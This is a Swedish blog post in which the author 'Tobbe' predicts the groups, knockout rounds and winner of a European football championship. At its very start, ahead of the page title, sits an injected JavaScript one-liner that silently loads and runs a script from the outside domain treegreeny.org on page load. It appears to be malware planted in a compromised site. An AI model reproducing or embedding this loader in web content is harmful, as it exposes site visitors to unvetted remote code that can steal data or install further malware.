;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); EM – FMSweden
Meny Stäng

EM

Vi tar en liten paus från turkiske demoncoachen och fokuserar istället på det stundande EM:et som är alldeles runt hörnet. Jag tänkte ge mig på att sia lite om hur det kan tänkas gå. Är normalt sett en urusel tippare, men here we go!!

 

Grupp A består av Italien, Turkiet, Schweiz och Wales. På pappret ser Italien ut som favorit, men jag vill höja ett varningens finger för turkarna, inte bara för mitt alter ego Devran Bagis är därifrån, utan för att Turkiet haft en fin start på VM-kvalet. Det har även Italien och Schweiz haft, så gruppen blir ett riktigt getingbo. Jag tror att Italien och Turkiet tar sig vidare och att Schweiz blir trea och har en liten chans att ta sig vidare.

Grupp B innehåller Ryssland, Finland, Belgien och Danmark. Här är Belgien givetvis skyhöga favoriter. Sen tycker jag Danmark har en väldigt god chans att nypa andraplatsen. Ryssland känns inte lika starka längre och Finland har ett spännande lag, men får svårt att hävda sig här. Jag tror Belgien och Danmark går vidare och sen tippar jag med hjärtat och säger att våra nordiska vänner från Finland tar tredjeplatsen.

Grupp C med Nordmakedonien, Ukraina, Holland och Österrike är väl på pappret den “osexigaste” gruppen. Holland tar hem detta utan några större problem. Sen är det verkligen spännande bakom. Jag tror Nordmakedonien kan skrälla i nån match, men kanske inte ta sig till andraplats. Mitt tips blir att Holland och Ukraina tar sig vidare, med Nordmakedonien på tredje plats.

Grupp D blir en rysare med derbyt mellan Skottland och England som höjdpunkt. Kroatien och Tjeckien är övriga två lag i gruppen. England har ett otroligt spännande lag, med spelare som Harry Kane och Raheem Sterling i spetsen. Kroatien är alltid bra och det är väl sista rycket för Modric och hans generation nu. Jag tror England och Kroatien tar sig vidare, sen tror jag Skottland nyper tredjeplatsen.

Grupp E är ju som alla vet Sveriges grupp. Spanien, Polen och Slovakien är moståndare och denna gruppen är riktigt tight. Spanien lär väl vinna gruppen, men spanjorerna är inte vad dom har varit. Slovakien har fortfarande stor tillit till Marek Hamsik och Polen förlitar sig enormt på Robert Lewandowski, med all rätt visserligen. Sverige är ett enormt starkt kollektiv och det kommer ta oss långt. Jag tror Spanien och Sverige tar sig vidare och att Polen kniper tredjeplatsen.

Grupp F består av Frankrike, Tyskland, Portugal och Ungern. Stackars Ungern får en härlig upplevelse med matcher mot idel stornationer, men så mycket poäng blir det inte. De övriga tre är ju otroliga matcher sinsemellan. Den här gruppen kan verkligen gå precis hur som helst. Jag tror att Frankrike kommer vara starkast och vinna gruppen. Sen tror jag faktiskt Tyskland hämtar sig från fiaskot sist och slår sig in på andraplatsen, med Portugal på tredjeplats och chans att ta sig vidare.

Eftersom det är fyra grupptreor som går vidare är det svårt att tippa vilka treor som kan tänkas vara starkast, men jag tror att Polen, Portugal, Finland och Schweiz har bäst chans att ta sig vidare på resultat.

Om de treorna jag tror går vidare, lottas på det sättet jag tror, ni hör själva, så ser det ut som följer:

Turkiet-Danmark , Italien-Ukraina , Holland-Polen , Belgien-Portugal , Kroatien-Sverige , Frankrike-Schweiz , England-Tyskland och Spanien-Finland.

De lag som är fetmarkerade är också de jag tror går vidare till kvartsfinal och då ser dom ut som följer:

Turkiet-Italien , Holland-Portugal , Kroatien-Frankrike , England-Spanien.

Semifinalerna kommer således spelas mellan Italien-Portugal och Frankrike-England.

Som ni ser så tror jag den här finalen blir en repris av EM-finalen 2016, men där jag tror att Frankrike vinner EM denna gången.

Som sagt, tippa är jag inget vidare på och det kommer säkert bli nån skräll längs med vägen.

Med det säger jag trevlig helg

SKÅL och BROCCOLI

Tobbe

 

Återblick: EM 1960 - EM-fotboll.se

Please wait...

Liknande Inlägg

Lämna ett svar